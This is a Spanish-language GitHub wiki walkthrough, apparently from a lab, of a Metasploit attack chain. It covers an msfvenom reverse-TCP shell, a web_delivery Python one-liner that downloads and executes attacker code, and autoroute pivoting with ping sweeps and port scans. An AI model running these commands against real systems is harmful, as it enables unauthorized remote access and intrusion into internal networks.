reverse msfconsole - danielcastropalomares/security GitHub Wiki

Creando un payload con msfvenom:

Creamos un payload :

root@kali:/tmp# msfvenom -p linux/x86/shell/reverse_tcp -f elf \
>   --platform linux -a x86 -e generic/none LHOST=172.31.255.129 LPORT=5555 \
>  '/tmp/linux-shell-staged-reverse-tcp-5555.elf'
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 123 (iteration=0)
generic/none chosen with final size 123
Payload size: 123 bytes
Final size of elf file: 207 bytes

Ponemos a escuchar metasploit:

msf exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(multi/handler) > 
msf exploit(multi/handler) > set LHOST 172.31.255.129
LHOST => 172.31.255.129
msf exploit(multi/handler) > set LPORT 5555
exploit

Lo ejecutamos en la maquina remota y veremos aparecer la nueva sesión:

$ ./linux-shell-staged-reverse-tcp-5555.elf

Kali:

[*] Sending stage (861348 bytes) to 172.31.255.115
[*] Meterpreter session 2 opened (172.31.255.129:5555 -> 172.31.255.115:42798) at 2019-04-08 22:12:57 +0200

Lo dejamos en background:

meterpreter > background
[*] Backgrounding session 2...

Enrutamos el trafico hacia la sesion 2:

msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                    Connection
  --  ----  ----                   -----------                                    ----------
  2         meterpreter x64/linux  uid=33, gid=33, euid=33, egid=33 @ 172.18.0.3  172.31.255.129:5555 -> 172.31.255.115:42798 (172.18.0.3)

web_delivery

Máquina atacante:

msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > setg lhost 172.31.255.129
msf exploit(multi/script/web_delivery) > setg lport 1111
msf exploit(multi/script/web_delivery) > run
msf exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.31.255.129:4444 
[*] Using URL: http://172.31.255.129:1111/ZTPbgL
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.31.255.129:1111/ZTPbgL');exec(r.read());"

Máquina victima:

python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.31.255.129:1111/ZTPbgL');exec(r.read());"

Y ahora en nuestra maquina kali veremos aparecer la conexión:

[*] Meterpreter session 1 opened (172.31.255.129:4444 -> 172.31.255.112:38712) at 2019-03-17 23:53:35 +0100

Ahora podemos ejecutar exploits de metasploit en la maquina victima. Para que nuestro metasploit que esta en nuestro Kali, pueda reconocer los rangos de red remotos, utilizamos el modulo autoroute, que enrutara automáticamente este tráfico vía la reverse shell abierta:

msf exploit(multi/script/web_delivery) > use post/multi/manage/autoroute
msf post(multi/manage/autoroute) > set session 1
session => 1
msf post(multi/manage/autoroute) > exploit

[!] SESSION may not be compatible with this module.
[*] Running module against vulnvm
[*] Searching for subnets to autoroute.
[*] Unable to get routes from session, trying interface list.
[+] Route added to subnet 172.31.255.0/255.255.255.0 from enp0s3.
[+] Route added to subnet 172.17.0.0/255.255.0.0 from docker0.
[+] Route added to subnet 172.18.0.0/255.255.0.0 from br-c714e887a53b.
[*] Post module execution completed

Ahora utilizamos el módulo de ping_sweep para descubrir las máquinas remotas:

msf post(multi/manage/autoroute) > use post/multi/gather/ping_sweep
msf post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255
rhosts => 172.18.0.0-255
msf post(multi/gather/ping_sweep) > set session 1
session => 1
msf post(multi/gather/ping_sweep) > exploit

[*] Performing ping sweep for IP range 172.18.0.0-255
[+]     172.18.0.2 host found
[+]     172.18.0.1 host found
[+]     172.18.0.3 host found
[+]     172.18.0.4 host found

Y el módulo de port scan:

msf auxiliary(scanner/portscan/tcp) >  use auxiliary/scanner/portscan/tcp
msf auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4
rhosts => 172.18.0.0-4
msf auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf auxiliary(scanner/portscan/tcp) > exploit

[+] 172.18.0.1:           - 172.18.0.1:22 - TCP OPEN
[+] 172.18.0.2:           - 172.18.0.2:80 - TCP OPEN
[+] 172.18.0.4:           - 172.18.0.4:2021 - TCP OPEN
[+] 172.18.0.3:           - 172.18.0.3:3306 - TCP OPEN
[+] 172.18.0.1:           - 172.18.0.1:8000 - TCP OPEN
[*] Scanned 1 of 5 hosts (20% complete)
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/portscan/tcp) >